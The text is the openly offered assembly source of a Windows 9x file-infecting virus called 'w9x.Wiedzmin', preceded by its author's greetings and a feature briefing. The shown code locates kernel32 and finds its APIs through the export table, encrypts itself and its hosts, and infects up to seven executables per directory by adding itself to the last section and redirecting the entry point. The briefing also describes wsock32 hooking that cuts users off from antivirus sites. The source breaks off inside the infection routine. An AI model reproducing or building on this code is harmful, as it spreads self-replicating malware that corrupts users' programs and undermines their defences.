;
;         W                          D                                  nnn
;        WW       Ww   o             D                M   O    Nn      nn
;       Ww        wW  i   eEeE   dddDD  ZzzZzZ  Mm   m m        nN    nn
;       wW        Ww  ii  e  E  d   dD      Zz  m M M  mm  ii   N n   n
;       Ww   w    wW  ii  Eeee  d   dD     z    mm m    m   i   n  N  n
;        W  W W   W   ii  e     d   dD    z      m    mm   ii   n   n n
;        wWw  wWwW   iii  eEee  d   dD  zZzZzZ  mm    mm    ii  n    nn
;                               ddddDd               mm   iii n      n
;             
;             ă(c) YuP - Deithwen Addan - Artist of Rebelionă      
;                              ă yup@tlen.pl ă
;                                
;   ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ                                  
;  Ä      w9x.Wiedzmin       Ä     
;   ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ                                  
;                                                            
;               
;   ÄÄÄÄÄÄÄÄÄÄÄ            
;  ÄDISCLAIMERĝ             
;   ÄÄÄÄÄÄÄÄÄÄÄ
;  This is a source of a virus, only source the compiled version
;  cannot leave your computer! Author is NOT RESPONSIBLE FOR ANY
;  ACTIONS WITH THIS CODE!               
;           
;                        
;                        
;   ÄÄÄÄÄÄÄÄÄÄÄÄ            
;  Ä The name  ĝ
;   ÄÄÄÄÄÄÄÄÄÄÄÄ
;              
;  The name 'Wiedzmin' was stolen from Andrzej Sapkowski saga "Wiedzmin".
;  (sapkowski.pl,sapkowski.cz) - someone said that he is another
;  Tolkien (in my opinion this book is even better then Tolkienz
;  "Lord of the Rings"). 
;  Wiedzmin was a some kind of mutant (only few kids from 10 can survive
;  wiedzmin test). As a mutant he was very fast, he was master of fencig,
;  he can see at night, and he of course can make magic signs.
;  Blah ...
;  Next he went, and travel around the world (he was killing monsterz for money). 
;  In his journey he met new fantasic characters like Regis (vapire), 
;  Milva (hunter), Jaskier (bard), Yennefer (witch) , Ciri (child of destinty)
;  ...
;  
;  The book is realy FANTASTIC! Full of adventures, fight, sex (X-D),
;  blood, swearwords, and much much more! I realy advice you to READ IT!
;  (check translationz for your language: www.sapkowski.pl). 
;  If you like fantasy you CAN'T miss IT!
;  
;  
;   ÄÄÄÄÄÄÄÄÄÄÄÄ            
;  Ä   Music   ĝ
;   ÄÄÄÄÄÄÄÄÄÄÄÄ
;  
;   I'd like to thx some kewl music groups in range of rock-hiphop:
;   Outsidez:                                Polish groupz: 
;   ćDeep Purple                             ćMolesta      
;   ćIron Maiden                             ćFenomen
;   ćLinkin Park                             ćZipera
;   ćRage Against the Machine                ćGrammatik 
;   ćKoRn                                    ćEldo
;   ćLimp Bizkit                             ćKaliber 44
;
;   I'm a weird person ;] 
;                        
;
;   ÄÄÄÄÄÄÄÄÄÄÄÄ            
;  Ä   Greetz  ĝ
;   ÄÄÄÄÄÄÄÄÄÄÄÄ
;
;   Greetz go to:
;   ćFriendz from city:
;    ŸYoo             (:])
;    ŸMisiek          (dzienx za plyty stary)
;    ŸKlosina         (nie rzucaj nozami)
;    ŸStraż Miejska   (nie trzymamy nog na lawkach :p) 
;    ŸI dla reszty ludkuf, nie wymienialem was bo i tak
;     nigdy tego nie przeczytacie.
;
;   ćGuyz from Undernet:
;    ŸToro           (busy today?)
;    ŸSlageHammer    (helo tester ;D)
;    ŸSpanska        (BloodHound.W32.WSWORM ;[) 
;    żBFF70000h      (lagz lagz lagz)
;
;   ćGuyz from irc.pl:
;    ŸBlaze          (stuk puk)    
;    ŸDetergent      (walek)
;    ŸShmastah       (judeIRC ;])
;    ŸAjron          (ten nie prawdziwy :P)
;    ŸAamf-girl      (gimnazjalistka ;P)
;    ŸWizja          (dolly ma reumatyzm czy jakos tak ;>)
;    ŸPafko          (dragonball rulez!)
;    ŸCrash          (why you? ;P)
;     
;
;   ÄÄÄÄÄÄÄÄÄÄÄÄ            
;  Ä  Briefing ĝ
;   ÄÄÄÄÄÄÄÄÄÄÄÄ
;            
;  Virus name        : w9x.Wiedzmin
;  Virus version     : 1.0 
;  Virus author      : Lord YuP - Deithwen Addan     
;  Release date      : 6.02.02+8.02.02 i forgot to install SEH, he he
;  Virus type        : PE infector and WSOCK32.DLL hooker
;  Target Systems    : win95<nt>, win98<nt>, winME<t>
;                      †[nt] - not tested (should work, if not fuck it!)
;                      †[t]  - tested
;                                   
;                                   
;  Encryption        : 3 LAYERS CRYPTED BY RANDOM NUMBER! 
;                      † 1 - cryptz main virus body †
;                      † 2 - cryptz host body       †
;                      † 3 - cryptz virus data      †
;                      
;                      Every layer is crypted by another key.
;                                                    
;  Virus helper      : Virus when found section called different
;                      then ".text" or "CODE" (EIP must point to
;                      it) it is gonna to crypt all file body
;                      and put only decryptor into last section.
;                      The main body (with other virus probably) 
;                      is crypted by random key. EIP points to
;                      decryptor.
;                      
;                      
;                                                                          
;  Polymorphic       : Yep random key crypting, adding
;                      90h<NOP> garbage in the range
;                      of 0-255.                                    
;                        
;                             
;  AntiAV            : Virus wouldn't infect filez
;                      with 'a','A','E','e','v','V'
;                      at start.                             
;                                           
;  
;  AntiDEBUG         : Yep, using win9x Softice detection,
;                      and IsDebuggerPresent API. When
;                      sice is found it shows message in
;                      debbuger and exec int 19h !
;                      Other debbugers like td32, SoftSnoop
;                      end so on =  int 19h!
;                       
;                      
;  WSOCK32 hooker    : Virus infect wsock32.dll replacing the
;                      send, connect function addressez.
;                      After reboot (wininit.ini ;P) functionz
;                      will be hooked. User will never connect 
;                      to AV sitez (error: host not found), 
;                      and when user will try to put a file in
;                      the FTP account, virus will infect it on
;                      fly.                     
;  
;  
;  
;  Infection procez  : Virus infect 7 filez in the local
;                      directory and 7 filez in the windowz
;                      directory. Virus is going to apend
;                      itself to the last section. The section
;                      is increased. EIP points to it.                                 
;                                                  
;                                                         
;
;  Payload           : On 22.06 or 22.12 every run it gonna
;                      print color string in the infinite 
;                      loop. The string will be VISIBLE 
;                      everywhere - virus grabz active
;                      window HDC! 
;
;
;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WIEDZMIN.ASM]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Assembler directives (TASM syntax).  Everything below is position
; independent: variables are reached through an EBP delta computed at run
; time, because the body executes wherever the host's last section lands.
.386                                       ; 32-bit instruction set
.model flat                                ; single flat Win32 segment
jumps                                      ; TASM: widen out-of-range conditional jumps automatically
locals                                     ; TASM: enable @@-prefixed local labels




       
        extrn ExitProcess:PROC       
        extrn MessageBoxA:PROC
       
     

; Win32 FILETIME: 64-bit timestamp split into two dwords.
FILETIME STRUC
dwLowDateTime   dd ?            ; low 32 bits
dwHighDateTime  dd ?            ; high 32 bits
FILETIME ends



; Win32 WIN32_FIND_DATA as filled by FindFirstFileA/FindNextFileA.  The three
; FILETIME pairs are creation, last-access and last-write time in the Win32
; layout; only cFileName and nFileSizeLow are read by the code below.
WIN32_FIND_DATA         struc          ;FIND DATA
dwFileAttributes        dd      0       ; FILE_ATTRIBUTE_* flags
dwLowDateTime0          dd      ?       ; FILETIME #0
dwHigDateTime0          dd      ?
dwLowDateTime1          dd      ?       ; FILETIME #1
dwHigDateTime1          dd      ?
dwLowDateTime2          dd      ?       ; FILETIME #2
dwHigDateTime2          dd      ?
nFileSizeHigh           dd      ?
nFileSizeLow            dd      ?       ; overwritten with the GetFileSize result in @infect
dwReserved              dd      0,0
cFileName               db      260 dup(0)   ; MAX_PATH name; also used as the command-line argument buffer
cAlternateFilename      db      14 dup(0)    ; 8.3 name
                        db      2 dup(0)     ; padding
WIN32_FIND_DATA         ends

; Size constants.  start_h/hook_end, hooked_send/hooked_connect, HeapStart/
; HeapEnd, VirusEnd and @loop_decryptt are labels defined outside this view.
hooksize equ hook_end-start_h                          ; bytes of the wsock32 hook routine
sendh equ (offset hooked_send-offset start_h)          ; offset of the send hook inside it
connecth equ (offset hooked_connect-offset start_h)    ; offset of the connect hook inside it




vvsize              equ HeapEnd-HeapStart   ; scratch/data area appended after the body
virussize           equ VirusEnd-v_start    ; size of the code body
allsize             equ virussize
TO_DE               equ @loop_decryptt-@to_this   ; bytes covered by the outer decryptor loop
helper              equ @helper_end-@uncrypt      ; size of the stand-alone decryptor stub


; Emits virussize as five ASCII decimal digits (most significant first).
; Not expanded anywhere in this view.
virussizee       macro
		db      virussize/10000 mod 10 + "0"
		db      virussize/01000 mod 10 + "0"
		db      virussize/00100 mod 10 + "0"
		db      virussize/00010 mod 10 + "0"
		db      virussize/00001 mod 10 + "0"
		endm

    
  
        
.DATA

; A single uninitialised byte - presumably only so the data segment is not empty.
db ?


.CODE
; Entry point of the body once it has been appended to a host.  Saves the
; host's registers, computes the EBP delta, strips the outer encryption
; layer and then decrypts the API name list and the data area.
v_start:
pushad                        ; host registers, restored at _ETH before
pushfd                        ; control returns to the host

call @delta
@delta:
pop ebp                       ;ebp contains address of @delta right now in
sub ebp,offset @delta         ;memory -> we must sub the linking @delta val

cmp ebp,0                     ; delta 0 = running at the link address
je @_KERNEL                   ; (first generation, nothing is encrypted yet)


@main_decryptor:
lea edx,[ebp+offset @to_this] ; first byte covered by the outer layer
mov eax,[ebp+key_main]        ; key written by @combine_key
mov ecx,TO_DE                 ; byte count up to @loop_decryptt (outside this view)


@loop_decrypt:
xor byte ptr [edx],al         ; one key byte, the same for every position
inc edx
loop @loop_decrypt
cmp edi,'!PUY'                ; 'YUP!' in EDI: presumably set by the encrypting
jne @to_this                  ; caller so this loop can be reused in place -
ret                           ; TODO confirm against @crypt_my_body



@to_this:
lea edi,[ebp+offset APIList]  ; in-place decryption (EDI == ESI) of the API
lea esi,[ebp+offset APIList]  ; name list ...
call @UN_CRYPT_BYTEZ          ; (@UN_CRYPT_BYTEZ is defined outside this view)

lea edi,[ebp+offset TO_CRYPT_DATA]  ; ... and of the data area
lea esi,[ebp+offset TO_CRYPT_DATA]
call @UN_CRYPT_BYTEZ
; Install a SEH frame so that any fault inside the body lands in 'fault'
; (which unwinds to the host), then locate kernel32 by probing the two
; fixed load addresses used on Win95 and WinME.  Anything else exits.
@_KERNEL:
lea eax, [ebp+fault]                ; Setup a SEH frame
push eax
push dword ptr fs:[0]
mov fs:[0], esp

mov eax,0BFF70000h             ; kernel32 base on Win95
cmp word ptr [eax],'ZM'        ; 'MZ' there -> treat it as kernel32
je _GOT_KERNEL
                        ; NT: maybe later (no NT support here)



mov eax,0BFF60000h             ; kernel32 base on WinME
cmp word ptr [eax],'ZM'        ; same 'MZ' probe
je _GOT_KERNEL

jmp @EXIT                      ; unknown platform: give up, run the host


_GOT_KERNEL:
mov dword ptr [ebp+capis],5h   ; capis==5 selects the plain name lookup in @__GPA
mov dword ptr [ebp+Kernel],eax ; remember the module base

; Export-table walk, a hand-rolled GetProcAddress.  EAX = module base on
; entry (kernel32 here; wsock_h when re-entered from make_real).  Reads the
; IMAGE_EXPORT_DIRECTORY fields into NON/AOF/AON/AOO.
@go_export:

mov dword ptr [ebp+NON],000000h     ; NumberOfNames
mov dword ptr [ebp + AOF],000000h   ; AddressOfFunctions (VA)
mov dword ptr [ebp + AON],000000h   ; AddressOfNames (VA)
mov dword ptr [ebp + AOO],000000h   ; AddressOfNameOrdinals (VA)

mov edx,eax
mov ebx,edx


mov edi, [eax + 03ch]          ; e_lfanew: a valid PE ?
add edx, edi
cmp dword ptr [edx],'EP'       ; 'PE' signature
jne @EXIT



mov edx,[edx + 078h]           ; RVA of the export directory (first data directory)
add edx,eax                    ; EDX -> IMAGE_EXPORT_DIRECTORY




mov esi,[edx + 018h]           ; NumberOfNames
mov dword ptr [ebp + NON],esi


mov esi,[edx+1Ch]              ; AddressOfFunctions RVA -> VA
mov dword ptr [ebp + AOF],esi
add dword ptr [ebp + AOF],eax

mov esi,[edx+20h]              ; AddressOfNames RVA -> VA
mov dword ptr [ebp + AON],esi
add dword ptr [ebp + AON],eax

mov esi,[edx+24h]              ; AddressOfNameOrdinals RVA -> VA
mov dword ptr [ebp + AOO],esi
add dword ptr [ebp + AOO],eax

; Linear scan of the export name table; EBX counts names.  The string to
; look for depends on capis: 5 -> APIS (the kernel32 name whose address
; becomes _GPA), 0 -> A1, 1 -> A2 (the two wsock32 names, see @GET_APIS).
@export_read:
mov esi,dword ptr [ebp + AON]
mov [ebp+offset IndexA],esi           ; IndexA walks the AddressOfNames array
mov esi,dword ptr [esi]
add esi,eax                           ; ESI -> first exported name

xor ebx,ebx                           ; EBX = name index


@__GPA:


cmp dword ptr [ebp+capis],5h
je @zwykle                            ; normal case: look for APIS


lea edi,[ebp+offset A1]               ; capis==0: first wsock32 name
mov ecx,A1s



cmp dword ptr [ebp+capis],1
jne @porownaj

lea edi,[ebp+offset A2]               ; capis==1: second wsock32 name
mov ecx,A2s
jmp @porownaj

@zwykle:
lea edi,[ebp + offset APIS]                  ; name of the API to resolve



@GET_GPA:
mov ecx,APIS_SIZE                          ;size api


@porownaj:
rep cmpsb                                  ;scan (compare name)
je found                                   ;if equal calculate function address


Scan_dalej:
add dword ptr [ebp + offset IndexA],4      ; next name RVA
mov esi,[ebp + offset IndexA]
mov esi,[esi]
add esi,eax

cmp dword ptr [ebp+offset NON],ebx         ; name table exhausted?
je @EXIT                                   ; (tested both before and after the increment)
inc ebx
cmp dword ptr [ebp+offset NON],ebx
je @EXIT

jmp @__GPA

; A name matched at index EBX.  ordinal = AddressOfNameOrdinals[EBX] (word),
; entry = AddressOfFunctions[ordinal] (dword).  In normal mode the entry is
; read and stored in _GPA; in wsock32 mode (go_wsock==1) the entry itself
; is overwritten with the location of the hook routine.
found:
mov eax,ebx                                  ; we have the index

mov ecx,edi
inc ecx
push ecx                                   ; saved and restored below, otherwise unused

mov eax,ebx                                ;EAX=>counter
mov ecx,2
mul ecx                                    ; EAX = index*2 (ordinal table holds words)
pop ecx

mov esi,[ebp + AOO]
add esi,eax
xor eax,eax


mov ax,word ptr [esi]                      ; AX = ordinal
mov ecx,4
mul ecx                                    ; EAX = ordinal*4 (function table holds dwords)




cmp dword ptr [ebp+go_wsock],1
jne @skip_it_urgh                          ; normal lookup

mov esi,[ebp + AOF]
add esi,eax                                ; ESI -> export entry to patch
mov eax,[esi]                              ; original value (not used further)




cmp dword ptr [ebp+capis],1
je @make_1

;mov ebx,dword ptr [ebp+wsock_hh]
;mov dword ptr [ebp+a_send],eax
;add dword ptr [ebp+a_send],ebx
;mov eax,dword ptr [ebp+a_send]

mov ebx,sendh
mov edx,dword ptr [ebp+moj_address]                    ; moj_address = raw offset where the hook
add edx,ebx                                            ; was written (@infect) + send offset
jmp make_real


@make_1:
mov ebx,connecth
mov edx,dword ptr [ebp+moj_address]                    ; same, + connect offset
add edx,ebx



make_real:


mov [esi],edx                               ; export entry now refers to the hook

inc dword ptr [ebp+capis]                   ; 0 -> 1 after the first name, 2 when both are done
cmp dword ptr [ebp+capis],2
je @go_out_now

mov eax,dword ptr [ebp+wsock_h]             ; wsock_h is set outside this view -
jmp @go_export                              ; presumably the mapped wsock32 image; confirm

@go_out_now: ret


@skip_it_urgh:
mov esi,[ebp + AOF]
add esi,eax
mov edi,dword ptr [esi]                     ; function RVA
add edi,[ebp+offset Kernel]                 ; + module base
mov eax,edi
mov dword ptr [ebp+_GPA],eax                ; _GPA = resolved address of APIS

; Resolve every name in APIList through _GPA and store the addresses
; consecutively from _FindFirstFileA on (one dword per name).  APIList is
; NUL-separated and terminated by a 07h byte.  Then load wsock32, resolve
; the hooked names, allocate a scratch buffer and run the wsock32 infector.
@GET_APIS:                                   ;API Search
xor esi,esi
lea esi,[ebp+offset APIList]
lea edi,[ebp+offset _FindFirstFileA]         ; first slot of the address table
                                             ; stosd stores EAX at EDI and advances 4 bytes



@go_table:
push esi                                     ; lpProcName
push dword ptr [ebp+offset Kernel]           ; hModule
call dword ptr [ebp+offset _GPA]
stosd

@next_byte:
inc esi                                      ; advance to the terminating NUL
cmp byte ptr [esi],00h
jne @next_byte


inc esi
cmp byte ptr [esi],07h                       ; 07h ends the list
jne @go_table

mov eax,dword ptr [ebp+_GetCurrentDirectoryA] ; second copies of two pointers
mov dword ptr [ebp+gcd],eax                    ; (gcd/wex consumers are outside this view)
mov eax,dword ptr [ebp+_WinExec]
mov dword ptr [ebp+wex],eax

lea eax,[ebp+offset wsock]                   ; library name at 'wsock' (outside this view);
inc eax                                      ; its first byte is skipped - presumably a marker
push eax
call dword ptr [ebp+_LoadLibraryA]
mov dword ptr [ebp+wsock_hh],eax             ; wsock32 module handle (in memory)


lea ecx,[ebp+offset sle]
push ecx
push eax
call dword ptr [ebp+offset _GPA]
mov dword ptr [ebp+_WSASetLastError],eax


lea ecx,[ebp+offset A1]                      ; A1/A2: the two wsock32 export names also
push ecx                                     ; searched for in @__GPA; the destinations
push dword ptr [ebp+wsock_hh]                ; suggest send and connect
call dword ptr [ebp+offset _GPA]
mov dword ptr [ebp+a_send],eax


lea ecx,[ebp+offset A2]
push ecx
push dword ptr [ebp+wsock_hh]
call dword ptr [ebp+offset _GPA]
mov dword ptr [ebp+a_connect],eax



push 4h                             ; PAGE_READWRITE
push 1000h                          ; MEM_COMMIT
push 1000                           ; size of buffer
push 0                              ; lpAddress
call dword ptr [ebp+_VirtualAlloc]  ; Alloc IT!
mov dword ptr [ebp+vbuf],eax        ; scratch buffer, released in @EXIT


;********************************DEBUG TRAP******************************************************
;call @debug_trap                   ; anti-debug check (@debug_trap), disabled in this build
;************************************************************************************************
call @wsockz                        ; wsock32.dll infection (defined outside this view)
mov dword ptr [ebp+go_wsock],0      ; back to normal PE-infection mode

; Trigger check: on 22 June or 22 December run the payload (make_it_real
; loops forever and never returns).  Otherwise re-encrypt what @to_this
; decrypted, using a freshly generated key, before looking for hosts.
lea eax,[ebp+SYSTEM_TIME]
push eax
call dword ptr [ebp+_GetSystemTime]   ; fills the SYSTEMTIME at SYSTEM_TIME

cmp word ptr [ebp+wMonth],6          ;22.06 Midaëte
jne try_
cmp word ptr [ebp+wDay],22
jne try_
call make_it_real


try_:
cmp word ptr [ebp+wMonth],12         ;22.12 Midinvaerne
jne cya_folx
cmp word ptr [ebp+wDay],22
jne cya_folx
call make_it_real


cya_folx:




call @GGEN_KEY                        ; new random key (defined outside this view)
lea edi,[ebp+offset APIList]
lea esi,[ebp+offset APIList]
call @CRYPT_BYTEZ                     ; in-place encryption (EDI == ESI)

lea edi,[ebp+offset TO_CRYPT_DATA]
lea esi,[ebp+offset TO_CRYPT_DATA]
call @CRYPT_BYTEZ


; Command-line mode: when started with a file-name argument whose fourth
; character from the end is '.' (a three-letter extension), infect only
; that file and terminate.  Otherwise fall through to the directory scan.
_done:
lea edi,[ebp+finddata.cFileName]    ; argument is copied here
call dword ptr [ebp+_GetCommandLineA]
mov esi,eax

xor ebx,ebx                         ; EBX = bytes consumed after the blank (incl. the NUL)
_skip_space:
lodsb                               ; skip argv[0] up to the first blank
cmp al,0
je @GetWDir                         ; no argument
cmp al,' '
je _ave_it
jmp _skip_space


_ave_it:
lodsb
inc ebx
cmp al,0
je @infect_shit
stosb                               ; copy the argument into finddata.cFileName
jmp _ave_it

@infect_shit:
cmp ebx,4
jl @GetWDir                         ; too short
lea esi,[ebp+offset finddata.cFileName]
add esi,ebx
sub esi,5                           ; -> 4th character before the NUL
lodsb
cmp al,'.'
je yep_it
jmp @GetWDir


yep_it:

push dword ptr [ebp+key_main]       ; @infect overwrites these per-host values;
push dword ptr [ebp+key_next]       ; keep our own copies across the call
push dword ptr [ebp+e_bytes]
push dword ptr [ebp+e_where]
push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase]
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
pop dword ptr [ebp+e_where]
pop dword ptr [ebp+e_bytes]
pop dword ptr [ebp+key_next]
pop dword ptr [ebp+key_main]

push 0h
call dword ptr [ebp+_ExitProcess]   ; the host is not run in this mode

; Directory scan: up to 7 infections (counter 'ic', bumped inside @infect)
; in the current directory, then up to 7 in the Windows directory, using
; the search pattern at 'marker' (outside this view).  The start directory
; is restored afterwards.
@GetWDir:
lea eax,[ebp+offset winDIR]
push 260                            ; uSize
push eax                            ; lpBuffer
call dword ptr [ebp+_GetWindowsDirectoryA]

;now local dir
lea eax,[ebp+offset oldDIR]
push eax                            ; lpBuffer
push 560                            ; nBufferLength
call dword ptr [ebp+_GetCurrentDirectoryA]


mov dword ptr [ebp+was_win],0000000h  ; 0 = still in the start directory
@Find1st:
mov dword ptr [ebp+ic],0000000h     ; infections in this directory so far
lea eax,[ebp+offset finddata]
push eax                            ; lpFindFileData
lea eax,[ebp+offset marker]
push eax                            ; lpFileName (search pattern)
call dword ptr [ebp+_FindFirstFileA]
mov dword ptr [ebp+sHnd],eax
inc eax                             ; INVALID_HANDLE_VALUE (-1): no match
jz @d_dalej

@workk:
push dword ptr [ebp+key_main]       ; preserve our own copies around @infect
push dword ptr [ebp+key_next]
push dword ptr [ebp+e_bytes]
push dword ptr [ebp+e_where]
push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase]
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
pop dword ptr [ebp+e_where]
pop dword ptr [ebp+e_bytes]
pop dword ptr [ebp+key_next]
pop dword ptr [ebp+key_main]


@@Fnext:
lea eax,[ebp+offset finddata]
push eax
push dword ptr [ebp+offset sHnd]
call dword ptr [ebp+_FindNextFileA]
cmp eax,0
je @d_dalej                         ; no more matches

push dword ptr [ebp+key_main]       ; same save/restore as at @workk
push dword ptr [ebp+key_next]
push dword ptr [ebp+e_bytes]
push dword ptr [ebp+e_where]
push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase]
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
pop dword ptr [ebp+e_where]
pop dword ptr [ebp+e_bytes]
pop dword ptr [ebp+key_next]
pop dword ptr [ebp+key_main]


cmp dword ptr [ebp+ic],7            ; stop after 7
jne @@Fnext

@d_dalej:
cmp dword ptr [ebp+was_win],0
jne @dalej                          ; Windows directory already done

_WinINF:
cmp dword ptr [ebp+was_win],0
jne _stepnext



lea eax,[ebp+offset winDIR]
push eax
call dword ptr [ebp+_SetCurrentDirectoryA]   ; switch to the Windows directory

mov dword ptr [ebp+ic],0000000h
mov dword ptr [ebp+was_win],1



push dword ptr [ebp+sHnd]
call dword ptr [ebp+_FindClose]



_stepnext:
cmp dword ptr [ebp+ic],7            ; ic was just zeroed, so this restarts the scan
jne @Find1st


@dalej:
lea eax,[ebp+offset oldDIR]
push eax
call dword ptr [ebp+_SetCurrentDirectoryA]   ; back to the start directory
jmp @EXIT

; SEH handler installed at @_KERNEL.  On a fault, ESP is reset to the
; establisher frame ([esp+8] of the handler's arguments = address of the
; saved fs:[0]) and execution falls into the normal exit path.
fault:
mov esp, [esp+8]

; Common exit: free the scratch buffer, remove the SEH frame, decrypt the
; host's entry code and jump to the original entry point.
@EXIT:

push 4000h                          ; MEM_RELEASE
push 1000                           ; dwSize
push dword ptr [ebp+vbuf]
call dword ptr [ebp+_VirtualFree]

pop dword ptr fs:[0]                ; previous handler back
add esp, 4                          ; drop our handler address


cmp ebp,0             ;first GeneratioN?
jne _ETH              ; no -> return to the host
call fakehost         ; first generation has no host: run the stand-in (outside this view)


_ETH:

call @uncrypt         ; decrypt the host's entry section in memory (czy_je == 0 here)


popfd
popad                 ; host registers as saved at v_start
call @gd
@gd: pop ebp          ; recompute the delta, EBP was just restored by popad
     sub ebp,offset @gd

mov eax,dword ptr [ebp+hosteip]
add eax,dword ptr [ebp+imagebase]
jmp eax               ; original entry point = RVA + ImageBase

Kernel dd 0           ; module base found at @_KERNEL
                   



;<##############################################################################################>
;------------------------------------------------------------------------------------------------
;************************************************************************************************
;INFECT EM GLOWZ !!!!
;************************************************************************************************
;------------------------------------------------------------------------------------------------
;<##############################################################################################>

; Infect the file named in finddata.cFileName.  Part 1: name filter, open,
; map and validate the PE header, save the host values needed to return to
; it.  Behaviour depends on go_wsock (1 = wsock32.dll hook mode).
@infect:
call @bad_name                  ; name filter (outside this view): EDI=1 -> skip
cmp edi,1
jne _continue
ret

@infect0:
_continue:
lea esi,[ebp+offset finddata.cFileName]   ; ESI -> file name

push esi
call dword ptr [ebp+_GetFileAttributesA]
mov dword ptr [ebp+fileAtrib],eax         ; restored at @@@z
inc eax                                   ; -1: not accessible
jz _Out

lea eax,[ebp+F1]                ; read the three FILETIMEs into F1..F3 (put back at
push eax                        ; _Out2).  fHnd is not assigned anywhere in this view
lea eax,[ebp+F2]                ; - the handle opened below goes to fileHandle -
push eax                        ; so which handle is meant here needs confirming
lea eax,[ebp+F3]
push eax
push dword ptr [ebp+fHnd]
call dword ptr [ebp+_GetFileTime]


push 00000080h                  ; FILE_ATTRIBUTE_NORMAL
push esi
call dword ptr [_SetFileAttributesA+ebp]     ; clear read-only etc. so the file can be opened for writing
cmp eax,0
je _Out

;mov ecx,dword ptr [ebp+finddata.nFileSizeLow]
;mov [ebp+offset memory],ecx


; open the file read/write to get a handle for the mapping
xor eax,eax
lea esi,[ebp+offset finddata.cFileName]
push eax                        ; hTemplateFile
push 00000080h                  ; FILE_ATTRIBUTE_NORMAL
push 00000003h                  ; OPEN_EXISTING
push eax                        ; lpSecurityAttributes
push eax                        ; dwShareMode = 0
push 80000000h OR 40000000h     ; GENERIC_READ OR GENERIC_WRITE
push esi
call dword ptr [ebp+_CreateFileA]
mov edi,eax                                 ; EDI = handle
inc eax
jz _Out                                     ; INVALID_HANDLE_VALUE
dec eax
mov dword ptr [ebp+offset fileHandle],eax



_Oblicz:
push 0
push dword ptr [ebp+offset fileHandle]
call dword ptr [ebp+_GetFileSize]
mov dword ptr [ebp+fSize],eax
inc eax
jz _Out2                        ; INVALID_FILE_SIZE
dec eax
mov dword ptr [ebp+finddata.nFileSizeLow],eax  ; reused by @zostaf

mov ecx,dword ptr [ebp+fSize]
call MapF                       ; mapping object over the whole file


mov ecx,dword ptr [ebp+fSize]
call VMapF                      ; ESI = view base, walked like the kernel32 image above

_Check_PE:
cmp word ptr [esi],'ZM'
jne _Out3

mov ecx,[esi+3ch]               ; e_lfanew
cmp dword ptr [esi+ecx],'EP'
jne _Out3


add esi,ecx                      ;ESI => PE HEADER
mov edi,esi


_Saving:
mov dword ptr [ebp+header],esi
mov ecx,[esi+28h]               ; AddressOfEntryPoint
mov dword ptr [ebp+hosteip],ecx
mov ecx,[esi+3ch]               ; FileAlignment
mov dword ptr [ebp+align],ecx
mov ecx,[esi+34h]               ; ImageBase
mov dword ptr [ebp+imagebase],ecx
mov ecx,[esi+38h]                          ;get section align value
mov [ebp + _secAlign],ecx                  ;and save it

; Part 2: the infection itself.  An already-infected host carries "Wied"
; at PE-header offset 4Ch (the Win32VersionValue field).  Otherwise the
; file is remapped with room for the payload, the host's entry section is
; encrypted (@crypt_host), the last section header is enlarged and the
; body (or, in wsock32 mode, the hook code) is written after it.
_Infecto0:
cmp dword ptr [esi+4ch],"deiW"  ; infection marker (set below)
jz _No_infect



push  dword ptr [esi+3Ch]       ; FileAlignment, popped into ECX at @nextt



;***********************************************************************************************

mov eax,[ebp+offset fMapReal]   ; drop the mapping of the original size ...
push eax
mov eax, [ebp+_UnmapViewOfFile]
call eax

push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_CloseHandle]


;mov eax,dword ptr [ebp+go_wsock]



mov eax,dword ptr [ebp+fSize]            ; ... and map again with room for:
cmp dword ptr [ebp+go_wsock],1
je @dodaj
add eax,virussize+vvsize                 ; body + data area, or
;add eax,vvsize
jmp @nextt

@dodaj:add eax,hooksize                  ; only the hook code (wsock32 mode)




@nextt:
pop ecx                         ; FileAlignment
call Align_                     ; round the new size up
mov dword ptr [ebp+memory],eax


mov ecx,eax
call MapF                       ; the larger mapping extends the file

mov ecx,dword ptr [ebp+memory]
call VMapF

cmp dword ptr [ebp+go_wsock],1
je @0dal
call @crypt_host                ; encrypt the host entry section, sets help_virus
cmp dword ptr [ebp+help_virus],1
je _God                         ; helper mode finishes elsewhere (@mute_other_virus)


@0dal:
mov esi,[eax+3ch]
add esi,eax                      ;ESI => PE HEADER (of the new view)
mov edi,esi


;************************************************************************************************

inc dword ptr [ebp+ic]          ; count this infection

xor eax,eax
mov ax,[esi + 06h]                  ;load number of sections
mov ecx,28h                         ;28 bytes for each section header
dec eax                             ;seeking for last,...
mul ecx                             ;and mul it
add esi,eax                         ; Normalize
add esi,78h                         ; Ptr to dir table
mov edx,[edi+74h]                   ; EDX = number of data-directory entries
shl edx,3                           ; EDX = EDX*8
add esi,edx                         ; ESI = Ptr to last section header


mov edx,[esi+10h]                   ; EDX = SizeOfRawData
mov ebx,edx                         ; EBX = EDX
add edx,[esi+14h]                   ; EDX = EDX+PointerToRawData = raw end of the section

push edx                             ; Preserve EDX

mov eax,ebx                         ; EAX = EBX
add eax,[esi+0Ch]                   ; EAX = EAX+VA Address
                                                ; EAX = New EIP (RVA)
;mov [edi+28h],eax                   ; Change the new EIP
mov dword ptr [ebp+NewEIP],eax      ; Also store it

cmp dword ptr [ebp+go_wsock],1
je @infect_then                     ; wsock32 mode leaves the entry point alone


mov eax,dword ptr [ebp+NewEIP]
mov [edi+28h],eax                   ; AddressOfEntryPoint -> appended body


@infect_then:
mov eax,[esi+10h]                   ; EAX = new SizeOfRawData
cmp dword ptr [ebp+go_wsock],1
je @dallejj
add eax,vvsize+virussize            ; EAX = EAX+VirusSize
jmp @nexttt

@dallejj: add eax,hooksize
@nexttt:
mov ecx,[edi+3Ch]                   ; ECX = FileAlignment
call Align_                         ; Align!

mov [esi+10h],eax                   ; New SizeOfRawData

